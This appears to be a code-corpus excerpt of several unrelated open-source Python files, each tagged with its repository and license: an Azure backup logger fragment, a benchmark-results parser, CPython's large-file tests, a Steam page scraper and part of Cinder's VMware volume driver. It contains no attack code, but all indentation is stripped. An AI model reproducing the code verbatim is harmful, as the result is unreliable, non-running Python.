with open(self.con_path, "w") as C :
message = filter(lambda x : x in string.printable, msg)
C.write(message.encode('ascii','ignore'))
except IOError as e:
pass
def commit(self, logbloburi):
#commit to local file system first, then commit to the network.
self.hutil.log(self.msg)
blobWriter = BlobWriter(self.hutil)
# append the wala log at the end.
try:
# distro information
if(self.hutil is not None and self.hutil.patching is not None and self.hutil.patching.distro_info is not None):
distro_str = ""
if(len(self.hutil.patching.distro_info)>1):
distro_str = self.hutil.patching.distro_info[0] + " " + self.hutil.patching.distro_info[1]
else:
distro_str = self.hutil.patching.distro_info[0]
self.msg = "Distro Info:" + distro_str + "\n" + self.msg
self.msg = "Guest Agent Version is :" + waagent.GuestAgentVersion + "\n" + self.msg
with open("/var/log/waagent.log", 'rb') as file:
file.seek(0, os.SEEK_END)
length = file.tell()
seek_len_abs = 1024 * 10
if(length < seek_len_abs):
seek_len_abs = length
file.seek(0 - seek_len_abs, os.SEEK_END)
tail_wala_log = file.read()
self.msg = self.msg + "Tail of WALA Log:" + tail_wala_log
except Exception as e:
errMsg = 'Failed to get the waagent log with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
self.hutil.log(errMsg)
blobWriter.WriteBlob(self.msg, logbloburi)
def commit_to_local(self):
self.hutil.log(self.msg)
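# Usage sketch (illustrative only; `hutil` and `logbloburi` come from the
# surrounding extension handler and are not defined in this file):
#   logger = Backuplogger(hutil)
#   logger.log("snapshot started", local=True)   # forwarded to hutil.log immediately
#   logger.log("snapshot finished")              # buffered in logger.msg
#   logger.commit(logbloburi)                    # flush buffer and upload via BlobWriter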
| apache-2.0 |
blackoutjack/jamweaver | util/resultsutil.py | 1 | 4333 |
import sys  # needed for the stderr warning in parse_time() below
class Section:
# properties:
# name
# info
# headers
# rows
# total
# errors
def __init__(self, name, info):
self.name = name
self.info = info
self.headers = None
self.rows = {}
self.total = None
self.errors = []
def addData(self, data):
assert len(data) > 0, "Empty data provided to section %s" % self.name
if self.headers is None:
self.headers = data
elif data[0] == "total":
self.total = int(data[1])
else:
key = None
rowdata = None
for i in range(0, len(data)):
try:
datum = int(data[i])
except:
datum = data[i]
if i == 0:
key = datum
elif i == 1:
rowdata = datum
else:
assert False, "Unexpected number of data: %r" % data
self.rows[key] = rowdata
def addError(self, txt):
self.errors.append(txt)
def summary(self):
ret = self.name + ": " + str(self.total)
return ret
#/Section
class Action:
# properties:
# description
# stack
# sections
# times
# errors
def __init__(self, desc, stack):
self.description = desc
self.stack = stack
self.sections = {}
self.times = []
self.errors = []
def addSection(self, section, timename):
if section.name == timename:
# Special handling of timing info
tmstr = section.info
assert tmstr is not None
tm = parse_time(tmstr)
self.times.append(tm)
elif section.name in self.sections:
# keep every parsed section under the same name together
self.sections[section.name].append(section)
else:
self.sections[section.name] = [section]
def avg_time(self):
tot = 0
cnt = 0
for tm in self.times:
tot += tm
cnt += 1
return float(tot) / cnt
def time_summary(self):
return self.description + ": " + str(self.avg_time()) + "ms\n"
def section_summary(self, key):
ret = ""
sects = self.sections[key]
for sect in sects:
ret += sect.summary() + "\n"
return ret
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
ret = self.time_summary()
for key in self.sections:
ret += self.section_summary(key)
return ret
#/Action
class SourceVariant:
# properties:
# app
# descriptors
# actions
# errors
def __init__(self, app, desc):
self.app = app
self.descriptors = desc
self.actions = {}
self.errors = []
def getAction(self, desc, stack):
if desc in self.actions:
act = self.actions[desc]
# %%% Check that the stack matches.
else:
act = Action(desc, stack)
self.actions[desc] = act
return act
def descriptor(self):
return '.'.join(self.descriptors)
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
ret = self.descriptor() + "\n"
for key in self.actions:
ret += self.actions[key].time_summary()
return ret
#/SourceVariant
class AppStats:
# properties:
# name
# variants
# errors
def __init__(self, appname):
self.name = appname
self.variants = {}
self.errors = []
def getVariant(self, descparts):
desc = '.'.join(descparts)
# Translate legacy descriptors.
if desc == 'original':
desc = 'input'
elif desc == 'original.modular':
desc = 'coarse.input'
elif desc == 'collapsed':
desc = 'semantic0.collapsed'
elif desc == 'transformed':
desc = 'semantic0.collapsed'
# %%% May want to match A.B to B.A
if desc not in self.variants:
self.variants[desc] = SourceVariant(self, descparts)
return self.variants[desc]
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
# Pretty-print.
ret = self.name + "\n"
for key in self.variants:
ret += str(self.variants[key])
return ret
#/AppStats
def parse_time(tmstr):
if tmstr.endswith('ms'):
tmstr = tmstr[:-2]
conv = 1.0
elif tmstr.endswith('us'):
# Convert microseconds to fractional milliseconds.
tmstr = tmstr[:-2]
conv = 1.0 / 1000.0
elif tmstr.endswith('s'):
# Convert seconds to milliseconds.
tmstr = tmstr[:-1]
conv = 1000.0
else:
print >> sys.stderr, "Unspecified time unit, assuming ms: %s" % tmstr
conv = 1.0
tm = float(tmstr) * conv
return tm
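# Examples of the unit handling above (added comments, not part of the original):
#   parse_time("250ms")  -> 250.0
#   parse_time("1500us") -> 1.5      (microseconds scaled down by 1000)
#   parse_time("2s")     -> 2000.0   (seconds scaled up by 1000)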
| bsd-3-clause |
tempbottle/kbengine | kbe/src/lib/python/Lib/test/test_largefile.py | 96 | 6554 |
"""Test largefile support on system where this makes sense.
"""
import os
import stat
import sys
import unittest
from test.support import TESTFN, requires, unlink
import io # C implementation of io
import _pyio as pyio # Python implementation of io
# size of file to create (>2GB; 2GB == 2147483648 bytes)
size = 2500000000
class LargeFileTest:
"""Test that each file function works as expected for large
(i.e. > 2GB) files.
"""
def setUp(self):
if os.path.exists(TESTFN):
mode = 'r+b'
else:
mode = 'w+b'
with self.open(TESTFN, mode) as f:
current_size = os.fstat(f.fileno())[stat.ST_SIZE]
if current_size == size+1:
return
if current_size == 0:
f.write(b'z')
f.seek(0)
f.seek(size)
f.write(b'a')
f.flush()
self.assertEqual(os.fstat(f.fileno())[stat.ST_SIZE], size+1)
@classmethod
def tearDownClass(cls):
with cls.open(TESTFN, 'wb'):
pass
if not os.stat(TESTFN)[stat.ST_SIZE] == 0:
raise cls.failureException('File was not truncated by opening '
'with mode "wb"')
def test_osstat(self):
self.assertEqual(os.stat(TESTFN)[stat.ST_SIZE], size+1)
def test_seek_read(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
f.seek(0)
self.assertEqual(f.tell(), 0)
f.seek(0, 0)
self.assertEqual(f.tell(), 0)
f.seek(42)
self.assertEqual(f.tell(), 42)
f.seek(42, 0)
self.assertEqual(f.tell(), 42)
f.seek(42, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 2) # seek from the end
self.assertEqual(f.tell(), size + 1 + 0)
f.seek(-10, 2)
self.assertEqual(f.tell(), size + 1 - 10)
f.seek(-size-1, 2)
self.assertEqual(f.tell(), 0)
f.seek(size)
self.assertEqual(f.tell(), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
f.seek(-size-1, 1)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
def test_lseek(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(os.lseek(f.fileno(), 0, 0), 0)
self.assertEqual(os.lseek(f.fileno(), 42, 0), 42)
self.assertEqual(os.lseek(f.fileno(), 42, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 2), size+1+0)
self.assertEqual(os.lseek(f.fileno(), -10, 2), size+1-10)
self.assertEqual(os.lseek(f.fileno(), -size-1, 2), 0)
self.assertEqual(os.lseek(f.fileno(), size, 0), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
def test_truncate(self):
with self.open(TESTFN, 'r+b') as f:
if not hasattr(f, 'truncate'):
raise unittest.SkipTest("open().truncate() not available "
"on this system")
f.seek(0, 2)
# else we've lost track of the true size
self.assertEqual(f.tell(), size+1)
# Cut it back via seek + truncate with no argument.
newsize = size - 10
f.seek(newsize)
f.truncate()
self.assertEqual(f.tell(), newsize) # else pointer moved
f.seek(0, 2)
self.assertEqual(f.tell(), newsize) # else wasn't truncated
# Ensure that truncate(smaller than true size) shrinks
# the file.
newsize -= 1
f.seek(42)
f.truncate(newsize)
self.assertEqual(f.tell(), 42)
f.seek(0, 2)
self.assertEqual(f.tell(), newsize)
# XXX truncate(larger than true size) is ill-defined
# across platform; cut it waaaaay back
f.seek(0)
f.truncate(1)
self.assertEqual(f.tell(), 0) # else pointer moved
f.seek(0)
self.assertEqual(len(f.read()), 1) # else wasn't truncated
def test_seekable(self):
# Issue #5016; seekable() can return False when the current position
# is negative when truncated to an int.
for pos in (2**31-1, 2**31, 2**31+1):
with self.open(TESTFN, 'rb') as f:
f.seek(pos)
self.assertTrue(f.seekable())
def setUpModule():
try:
import signal
# The default handler for SIGXFSZ is to abort the process.
# By ignoring it, system calls exceeding the file size resource
# limit will raise OSError instead of crashing the interpreter.
signal.signal(signal.SIGXFSZ, signal.SIG_IGN)
except (ImportError, AttributeError):
pass
# On Windows and Mac OSX this test consumes large resources; It
# takes a long time to build the >2GB file and takes >2GB of disk
# space therefore the resource must be enabled to run this test.
# If not, nothing after this line stanza will be executed.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(size))
else:
# Only run if the current filesystem supports large files.
# (Skip this test on Windows, since we now always support
# large files.)
f = open(TESTFN, 'wb', buffering=0)
try:
# 2**31 == 2147483648
f.seek(2147483649)
# Seeking is not enough of a test: you must write and flush, too!
f.write(b'x')
f.flush()
except (OSError, OverflowError):
raise unittest.SkipTest("filesystem does not have "
"largefile support")
finally:
f.close()
unlink(TESTFN)
class CLargeFileTest(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
class PyLargeFileTest(LargeFileTest, unittest.TestCase):
open = staticmethod(pyio.open)
def tearDownModule():
unlink(TESTFN)
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 |
herrniemand/KiwiPycon2015 | parser.py | 1 | 3197 |
from bs4 import BeautifulSoup
import re
def clean( content, form ):
expressions = {
'tabs' : r'[\n\t\r]',  # '|' inside a character class is literal, so it is omitted here
'numbers' : r'[^0-9\.]'
}
regex = re.compile(expressions[form])
return regex.sub('', content)
def prepare( data ):
soup = BeautifulSoup(data, 'html.parser')
if not 'Site Error' in soup.find('title').text:
game = {
'appid' : 0,
'name' : soup.find('div', {'class': 'apphub_AppName'}),
'price' : soup.find('div', {'class': 'game_purchase_price price'}),
'currency' : soup.find('div', {'class': 'game_purchase_price price'}),
'tags' : soup.find_all('a', {'class': 'app_tag'}),
'rating' : {
'count' : soup.find('meta', { 'itemprop' : 'ratingValue' }),
'total' : soup.find('meta', { 'itemprop' : 'reviewCount' })
}
}
try:
game['details_block'] = [(i.parent.b.contents[0],i.contents[0]) for i in soup.find('div', {'class' : 'details_block'}).find_all('a')]
except:
game['details_block'] = None #Some pages don't have a details block
return game
def cook( data ):
def name( item ):
if item != None:
return clean(item.text, 'tabs')
else:
return ''
def price( item ):
if item != None:
if 'Free to play' in item.text:
return 0.0
else:
return clean(item.text, 'numbers')
else:
return 0.0
def currency( item ):
if item != None:
if 'Free to play' in item.text:
return ''
else:
return re.findall(r'[A-Za-z]*[$ยขยฃยคยฅึุเงฒเงณเงปเซฑเฏนเธฟแโฌ]', item.text)
else:
return ''
def rating( item ):
if item != None:
return item['content']
else:
return 0
def genre( item ):
genres = []
if item != None:
for thing in item:
if 'Genre' in thing[0] and len(thing) == 2:
genres.append(thing[1])
return genres
return []
def publisher( item ):
if item != None:
for thing in item:
if 'Publisher' in thing[0] and len(thing) == 2:
return thing[1]
return ''
def developer( item ):
if item != None:
for thing in item:
if 'Developer' in thing[0] and len(thing) == 2:
return thing[1]
return ''
game = {
'appid' : data['appid'],
'name' : name(data['name']),
'price' : price(data['price']),
'currency' : currency(data['currency']),
'tags' : [ clean(tag.text, 'tabs') for tag in data['tags'] ],
'rating' : {
'total' : rating(data['rating']['total']),
'count' : rating(data['rating']['count'])
},
'genre' : genre(data['details_block']),
'publisher' : publisher(data['details_block']),
'developer' : developer(data['details_block'])
}
return game
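# Usage sketch (illustrative; `requests` and the Steam store URL/appid are
# assumptions, not part of this script):
#   import requests
#   html = requests.get("http://store.steampowered.com/app/570/").text
#   raw = prepare(html)        # returns None when the page title is a "Site Error"
#   if raw is not None:
#       raw["appid"] = 570     # prepare() leaves appid at 0
#       record = cook(raw)     # normalised dict: name, price, tags, rating, ...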
| mit |
Datera/cinder | cinder/volume/drivers/vmware/volumeops.py | 3 | 82850 |
# Copyright (c) 2013 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Implements operations on volumes residing on VMware datastores.
"""
from oslo_log import log as logging
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware.objects import datastore as ds_obj
from oslo_vmware import vim_util
import six
from six.moves import urllib
from cinder.i18n import _
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
LOG = logging.getLogger(__name__)
LINKED_CLONE_TYPE = 'linked'
FULL_CLONE_TYPE = 'full'
BACKING_UUID_KEY = 'instanceUuid'
def split_datastore_path(datastore_path):
"""Split the datastore path to components.
return the datastore name, relative folder path and the file name
E.g. datastore_path = [datastore1] my_volume/my_volume.vmdk, returns
(datastore1, my_volume/, my_volume.vmdk)
:param datastore_path: Datastore path of a file
:return: Parsed datastore name, relative folder path and file name
"""
splits = datastore_path.split('[', 1)[1].split(']', 1)
datastore_name = None
folder_path = None
file_name = None
if len(splits) == 1:
datastore_name = splits[0]
else:
datastore_name, path = splits
# Path will be of form my_volume/my_volume.vmdk
# we need to split it into my_volume/ and my_volume.vmdk
splits = path.split('/')
file_name = splits[len(splits) - 1]
folder_path = path[:-len(file_name)]
return (datastore_name.strip(), folder_path.strip(), file_name.strip())
class VirtualDiskPath(object):
"""Class representing paths of files comprising a virtual disk."""
def __init__(self, ds_name, folder_path, disk_name):
"""Creates path object for the given disk.
:param ds_name: name of the datastore where disk is stored
:param folder_path: absolute path of the folder containing the disk
:param disk_name: name of the virtual disk
"""
self._descriptor_file_path = "%s%s.vmdk" % (folder_path, disk_name)
self._descriptor_ds_file_path = self.get_datastore_file_path(
ds_name, self._descriptor_file_path)
def get_datastore_file_path(self, ds_name, file_path):
"""Get datastore path corresponding to the given file path.
:param ds_name: name of the datastore containing the file represented
by the given file path
:param file_path: absolute path of the file
:return: datastore file path
"""
return "[%s] %s" % (ds_name, file_path)
def get_descriptor_file_path(self):
"""Get absolute file path of the virtual disk descriptor."""
return self._descriptor_file_path
def get_descriptor_ds_file_path(self):
"""Get datastore file path of the virtual disk descriptor."""
return self._descriptor_ds_file_path
class FlatExtentVirtualDiskPath(VirtualDiskPath):
"""Paths of files in a non-monolithic disk with a single flat extent."""
def __init__(self, ds_name, folder_path, disk_name):
"""Creates path object for the given disk.
:param ds_name: name of the datastore where disk is stored
:param folder_path: absolute path of the folder containing the disk
:param disk_name: name of the virtual disk
"""
super(FlatExtentVirtualDiskPath, self).__init__(
ds_name, folder_path, disk_name)
self._flat_extent_file_path = "%s%s-flat.vmdk" % (folder_path,
disk_name)
self._flat_extent_ds_file_path = self.get_datastore_file_path(
ds_name, self._flat_extent_file_path)
def get_flat_extent_file_path(self):
"""Get absolute file path of the flat extent."""
return self._flat_extent_file_path
def get_flat_extent_ds_file_path(self):
"""Get datastore file path of the flat extent."""
return self._flat_extent_ds_file_path
class MonolithicSparseVirtualDiskPath(VirtualDiskPath):
"""Paths of file comprising a monolithic sparse disk."""
pass
class VirtualDiskType(object):
"""Supported virtual disk types."""
EAGER_ZEROED_THICK = "eagerZeroedThick"
PREALLOCATED = "preallocated"
THIN = "thin"
# thick in extra_spec means lazy-zeroed thick disk
EXTRA_SPEC_DISK_TYPE_DICT = {'eagerZeroedThick': EAGER_ZEROED_THICK,
'thick': PREALLOCATED,
'thin': THIN
}
@staticmethod
def is_valid(extra_spec_disk_type):
"""Check if the given disk type in extra_spec is valid.
:param extra_spec_disk_type: disk type in extra_spec
:return: True if valid
"""
return (extra_spec_disk_type in
VirtualDiskType.EXTRA_SPEC_DISK_TYPE_DICT)
@staticmethod
def validate(extra_spec_disk_type):
"""Validate the given disk type in extra_spec.
This method throws an instance of InvalidDiskTypeException if the given
disk type is invalid.
:param extra_spec_disk_type: disk type in extra_spec
:raises: InvalidDiskTypeException
"""
if not VirtualDiskType.is_valid(extra_spec_disk_type):
raise vmdk_exceptions.InvalidDiskTypeException(
disk_type=extra_spec_disk_type)
@staticmethod
def get_virtual_disk_type(extra_spec_disk_type):
"""Return disk type corresponding to the extra_spec disk type.
:param extra_spec_disk_type: disk type in extra_spec
:return: virtual disk type
:raises: InvalidDiskTypeException
"""
VirtualDiskType.validate(extra_spec_disk_type)
return (VirtualDiskType.EXTRA_SPEC_DISK_TYPE_DICT[
extra_spec_disk_type])
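# Example mapping (added comment, not part of the original file): the
# extra_spec value 'thick' resolves to lazy-zeroed thick provisioning, e.g.
#   VirtualDiskType.get_virtual_disk_type('thick')            -> 'preallocated'
#   VirtualDiskType.get_virtual_disk_type('eagerZeroedThick') -> 'eagerZeroedThick'
#   VirtualDiskType.get_virtual_disk_type('sparse')           raises InvalidDiskTypeException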
class VirtualDiskAdapterType(object):
"""Supported virtual disk adapter types."""
LSI_LOGIC = "lsiLogic"
BUS_LOGIC = "busLogic"
LSI_LOGIC_SAS = "lsiLogicsas"
PARA_VIRTUAL = "paraVirtual"
IDE = "ide"
@staticmethod
def is_valid(adapter_type):
"""Check if the given adapter type is valid.
:param adapter_type: adapter type to check
:return: True if valid
"""
return adapter_type in [VirtualDiskAdapterType.LSI_LOGIC,
VirtualDiskAdapterType.BUS_LOGIC,
VirtualDiskAdapterType.LSI_LOGIC_SAS,
VirtualDiskAdapterType.PARA_VIRTUAL,
VirtualDiskAdapterType.IDE]
@staticmethod
def validate(extra_spec_adapter_type):
"""Validate the given adapter type in extra_spec.
This method throws an instance of InvalidAdapterTypeException if the
given adapter type is invalid.
:param extra_spec_adapter_type: adapter type in extra_spec
:raises: InvalidAdapterTypeException
"""
if not VirtualDiskAdapterType.is_valid(extra_spec_adapter_type):
raise vmdk_exceptions.InvalidAdapterTypeException(
invalid_type=extra_spec_adapter_type)
@staticmethod
def get_adapter_type(extra_spec_adapter):
"""Get the adapter type to be used in VirtualDiskSpec.
:param extra_spec_adapter: adapter type in the extra_spec
:return: adapter type to be used in VirtualDiskSpec
"""
VirtualDiskAdapterType.validate(extra_spec_adapter)
# We set the adapter type as lsiLogic for lsiLogicsas/paraVirtual
# since it is not supported by VirtualDiskManager APIs. This won't
# be a problem because we attach the virtual disk to the correct
# controller type and the disk adapter type is always resolved using
# its controller key.
if (extra_spec_adapter == VirtualDiskAdapterType.LSI_LOGIC_SAS or
extra_spec_adapter == VirtualDiskAdapterType.PARA_VIRTUAL):
return VirtualDiskAdapterType.LSI_LOGIC
else:
return extra_spec_adapter
class ControllerType(object):
"""Encapsulate various controller types."""
LSI_LOGIC = 'VirtualLsiLogicController'
BUS_LOGIC = 'VirtualBusLogicController'
LSI_LOGIC_SAS = 'VirtualLsiLogicSASController'
PARA_VIRTUAL = 'ParaVirtualSCSIController'
IDE = 'VirtualIDEController'
CONTROLLER_TYPE_DICT = {
VirtualDiskAdapterType.LSI_LOGIC: LSI_LOGIC,
VirtualDiskAdapterType.BUS_LOGIC: BUS_LOGIC,
VirtualDiskAdapterType.LSI_LOGIC_SAS: LSI_LOGIC_SAS,
VirtualDiskAdapterType.PARA_VIRTUAL: PARA_VIRTUAL,
VirtualDiskAdapterType.IDE: IDE}
@staticmethod
def get_controller_type(adapter_type):
"""Get the disk controller type based on the given adapter type.
:param adapter_type: disk adapter type
:return: controller type corresponding to the given adapter type
:raises: InvalidAdapterTypeException
"""
if adapter_type in ControllerType.CONTROLLER_TYPE_DICT:
return ControllerType.CONTROLLER_TYPE_DICT[adapter_type]
raise vmdk_exceptions.InvalidAdapterTypeException(
invalid_type=adapter_type)
@staticmethod
def is_scsi_controller(controller_type):
"""Check if the given controller is a SCSI controller.
:param controller_type: controller type
:return: True if the controller is a SCSI controller
"""
return controller_type in [ControllerType.LSI_LOGIC,
ControllerType.BUS_LOGIC,
ControllerType.LSI_LOGIC_SAS,
ControllerType.PARA_VIRTUAL]
class VMwareVolumeOps(object):
"""Manages volume operations."""
def __init__(self, session, max_objects, extension_key, extension_type):
self._session = session
self._max_objects = max_objects
self._extension_key = extension_key
self._extension_type = extension_type
self._folder_cache = {}
self._backing_ref_cache = {}
self._vmx_version = None
def set_vmx_version(self, vmx_version):
self._vmx_version = vmx_version
def get_backing(self, name, backing_uuid):
"""Get the backing based on name or uuid.
:param name: Name of the backing
:param backing_uuid: UUID of the backing
:return: Managed object reference to the backing
"""
ref = self.get_backing_by_uuid(backing_uuid)
if not ref:
# old version of the driver might have created this backing and
# hence cannot be queried by uuid
LOG.debug("Returning cached ref for %s.", name)
ref = self._backing_ref_cache.get(name)
LOG.debug("Backing (%(name)s, %(uuid)s) ref: %(ref)s.",
{'name': name, 'uuid': backing_uuid, 'ref': ref})
return ref
def get_backing_by_uuid(self, uuid):
LOG.debug("Get ref by UUID: %s.", uuid)
result = self._session.invoke_api(
self._session.vim,
'FindAllByUuid',
self._session.vim.service_content.searchIndex,
uuid=uuid,
vmSearch=True,
instanceUuid=True)
if result:
return result[0]
def build_backing_ref_cache(self, name_regex=None):
LOG.debug("Building backing ref cache.")
result = self._session.invoke_api(
vim_util,
'get_objects',
self._session.vim,
'VirtualMachine',
self._max_objects,
properties_to_collect=[
'name',
'config.instanceUuid',
'config.extraConfig["cinder.volume.id"]'])
while result:
for backing in result.objects:
instance_uuid = None
vol_id = None
for prop in backing.propSet:
if prop.name == 'name':
name = prop.val
elif prop.name == 'config.instanceUuid':
instance_uuid = prop.val
else:
vol_id = prop.val.value
if name_regex and not name_regex.match(name):
continue
if instance_uuid and instance_uuid == vol_id:
# no need to cache backing with UUID set to volume ID
continue
self._backing_ref_cache[name] = backing.obj
result = self.continue_retrieval(result)
LOG.debug("Backing ref cache size: %d.", len(self._backing_ref_cache))
def delete_backing(self, backing):
"""Delete the backing.
:param backing: Managed object reference to the backing
"""
LOG.debug("Deleting the VM backing: %s.", backing)
task = self._session.invoke_api(self._session.vim, 'Destroy_Task',
backing)
LOG.debug("Initiated deletion of VM backing: %s.", backing)
self._session.wait_for_task(task)
LOG.info("Deleted the VM backing: %s.", backing)
# TODO(kartikaditya) Keep the methods not specific to volume in
# a different file
def get_host(self, instance):
"""Get host under which instance is present.
:param instance: Managed object reference of the instance VM
:return: Host managing the instance VM
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, instance,
'runtime.host')
def get_hosts(self):
"""Get all host from the inventory.
:return: All the hosts from the inventory
"""
return self._session.invoke_api(vim_util, 'get_objects',
self._session.vim,
'HostSystem', self._max_objects)
def continue_retrieval(self, retrieve_result):
"""Continue retrieval of results if necessary.
:param retrieve_result: Result from RetrievePropertiesEx
"""
return self._session.invoke_api(vim_util, 'continue_retrieval',
self._session.vim, retrieve_result)
def cancel_retrieval(self, retrieve_result):
"""Cancel retrieval of results if necessary.
:param retrieve_result: Result from RetrievePropertiesEx
"""
self._session.invoke_api(vim_util, 'cancel_retrieval',
self._session.vim, retrieve_result)
# TODO(vbala): move this method to datastore module
def _is_usable(self, mount_info):
"""Check if a datastore is usable as per the given mount info.
The datastore is considered to be usable for a host only if it is
writable, mounted and accessible.
:param mount_info: Host mount information
:return: True if datastore is usable
"""
writable = mount_info.accessMode == 'readWrite'
# If mounted attribute is not set, then default is True
mounted = getattr(mount_info, 'mounted', True)
# If accessible attribute is not set, then default is False
accessible = getattr(mount_info, 'accessible', False)
return writable and mounted and accessible
def get_connected_hosts(self, datastore):
"""Get all the hosts to which the datastore is connected and usable.
The datastore is considered to be usable for a host only if it is
writable, mounted and accessible.
:param datastore: Reference to the datastore entity
:return: List of managed object references of all connected
hosts
"""
summary = self.get_summary(datastore)
if not summary.accessible:
return []
host_mounts = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datastore,
'host')
if not hasattr(host_mounts, 'DatastoreHostMount'):
return []
connected_hosts = []
for host_mount in host_mounts.DatastoreHostMount:
if self._is_usable(host_mount.mountInfo):
connected_hosts.append(host_mount.key.value)
return connected_hosts
def is_datastore_accessible(self, datastore, host):
"""Check if the datastore is accessible to the given host.
:param datastore: datastore reference
:return: True if the datastore is accessible
"""
hosts = self.get_connected_hosts(datastore)
return host.value in hosts
# TODO(vbala): move this method to datastore module
def _in_maintenance(self, summary):
"""Check if a datastore is entering maintenance or in maintenance.
:param summary: Summary information about the datastore
:return: True if the datastore is entering maintenance or in
maintenance
"""
if hasattr(summary, 'maintenanceMode'):
return summary.maintenanceMode in ['enteringMaintenance',
'inMaintenance']
return False
def _get_parent(self, child, parent_type):
"""Get immediate parent of given type via 'parent' property.
:param child: Child entity reference
:param parent_type: Entity type of the parent
:return: Immediate parent of specific type up the hierarchy via
'parent' property
"""
if not child:
return None
if child._type == parent_type:
return child
parent = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, child, 'parent')
return self._get_parent(parent, parent_type)
def get_dc(self, child):
"""Get parent datacenter up the hierarchy via 'parent' property.
:param child: Reference of the child entity
:return: Parent Datacenter of the param child entity
"""
return self._get_parent(child, 'Datacenter')
def get_vmfolder(self, datacenter):
"""Get the vmFolder.
:param datacenter: Reference to the datacenter entity
:return: vmFolder property of the datacenter
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datacenter,
'vmFolder')
def _get_child_folder(self, parent_folder, child_folder_name):
LOG.debug("Finding child folder: %s.", child_folder_name)
# Get list of child entities for the parent folder
prop_val = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, parent_folder,
'childEntity')
if prop_val and hasattr(prop_val, 'ManagedObjectReference'):
child_entities = prop_val.ManagedObjectReference
# Return if the child folder with input name is already present
for child_entity in child_entities:
if child_entity._type != 'Folder':
continue
child_entity_name = self.get_entity_name(child_entity)
if (child_entity_name
and (urllib.parse.unquote(child_entity_name)
== child_folder_name)):
return child_entity
def create_folder(self, parent_folder, child_folder_name):
"""Creates child folder under the given parent folder.
:param parent_folder: Reference to the parent folder
:param child_folder_name: Name of the child folder
:return: Reference to the child folder
"""
LOG.debug("Creating folder: %(child_folder_name)s under parent "
"folder: %(parent_folder)s.",
{'child_folder_name': child_folder_name,
'parent_folder': parent_folder})
try:
child_folder = self._session.invoke_api(self._session.vim,
'CreateFolder',
parent_folder,
name=child_folder_name)
LOG.debug("Created child folder: %s.", child_folder)
except exceptions.DuplicateName:
# Another thread is trying to create the same folder, ignore
# the exception.
LOG.debug('Folder: %s already exists.', child_folder_name)
child_folder = self._get_child_folder(parent_folder,
child_folder_name)
return child_folder
def create_vm_inventory_folder(self, datacenter, path_comp):
"""Create and return a VM inventory folder.
This method caches references to inventory folders returned.
:param datacenter: Reference to datacenter
:param path_comp: Path components as a list
"""
LOG.debug("Creating inventory folder: %(path_comp)s under VM folder "
"of datacenter: %(datacenter)s.",
{'path_comp': path_comp,
'datacenter': datacenter})
path = "/" + datacenter.value
parent = self._folder_cache.get(path)
if not parent:
parent = self.get_vmfolder(datacenter)
self._folder_cache[path] = parent
folder = None
for folder_name in path_comp:
path = "/".join([path, folder_name])
folder = self._folder_cache.get(path)
if not folder:
folder = self.create_folder(parent, folder_name)
self._folder_cache[path] = folder
parent = folder
LOG.debug("Inventory folder for path: %(path)s is %(folder)s.",
{'path': path,
'folder': folder})
return folder
def extend_virtual_disk(self, requested_size_in_gb, path, dc_ref,
eager_zero=False):
"""Extend the virtual disk to the requested size.
:param requested_size_in_gb: Size of the volume in GB
:param path: Datastore path of the virtual disk to extend
:param dc_ref: Reference to datacenter
:param eager_zero: Boolean determining if the free space
is zeroed out
"""
LOG.debug("Extending virtual disk: %(path)s to %(size)s GB.",
{'path': path, 'size': requested_size_in_gb})
diskMgr = self._session.vim.service_content.virtualDiskManager
        # The VMware API needs the capacity to be specified in KB, so convert
        # the capacity from GB to KB.
size_in_kb = requested_size_in_gb * units.Mi
task = self._session.invoke_api(self._session.vim,
"ExtendVirtualDisk_Task",
diskMgr,
name=path,
datacenter=dc_ref,
newCapacityKb=size_in_kb,
eagerZero=eager_zero)
self._session.wait_for_task(task)
LOG.info("Successfully extended virtual disk: %(path)s to "
"%(size)s GB.",
{'path': path, 'size': requested_size_in_gb})
def _create_controller_config_spec(self, adapter_type):
"""Returns config spec for adding a disk controller."""
cf = self._session.vim.client.factory
controller_type = ControllerType.get_controller_type(adapter_type)
controller_device = cf.create('ns0:%s' % controller_type)
controller_device.key = -100
controller_device.busNumber = 0
if ControllerType.is_scsi_controller(controller_type):
controller_device.sharedBus = 'noSharing'
controller_spec = cf.create('ns0:VirtualDeviceConfigSpec')
controller_spec.operation = 'add'
controller_spec.device = controller_device
return controller_spec
def _create_disk_backing(self, disk_type, vmdk_ds_file_path):
"""Creates file backing for virtual disk."""
cf = self._session.vim.client.factory
disk_device_bkng = cf.create('ns0:VirtualDiskFlatVer2BackingInfo')
if disk_type == VirtualDiskType.EAGER_ZEROED_THICK:
disk_device_bkng.eagerlyScrub = True
elif disk_type == VirtualDiskType.THIN:
disk_device_bkng.thinProvisioned = True
